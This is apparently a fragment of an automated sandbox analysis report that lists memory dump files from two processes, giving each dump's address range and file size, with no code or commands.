memory/4484-798-0x000000001B180000-0x000000001B232000-memory.dmp
Filesize: 712KB
-
memory/4484-797-0x0000000002CC0000-0x0000000002D10000-memory.dmp
Filesize: 320KB
-
memory/4484-801-0x000000001B120000-0x000000001B132000-memory.dmp
Filesize: 72KB
-
memory/4484-802-0x000000001C5E0000-0x000000001C61C000-memory.dmp
Filesize: 240KB
-
memory/4812-99-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize: 32KB
-
memory/4812-98-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize: 32KB
-
memory/4812-97-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize: 32KB
-
memory/4812-96-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize: 32KB
-
memory/4812-102-0x00007FFD22F60000-0x00007FFD23169000-memory.dmp
Filesize: 2.0MB
-
memory/4812-106-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize: 32KB
-
memory/4812-103-0x00007FFD22780000-0x00007FFD2283D000-memory.dmp
Filesize: 756KB
-
memory/4812-101-0x0000000140000000-0x0000000140008000-memory.dmp
Filesize: 32KB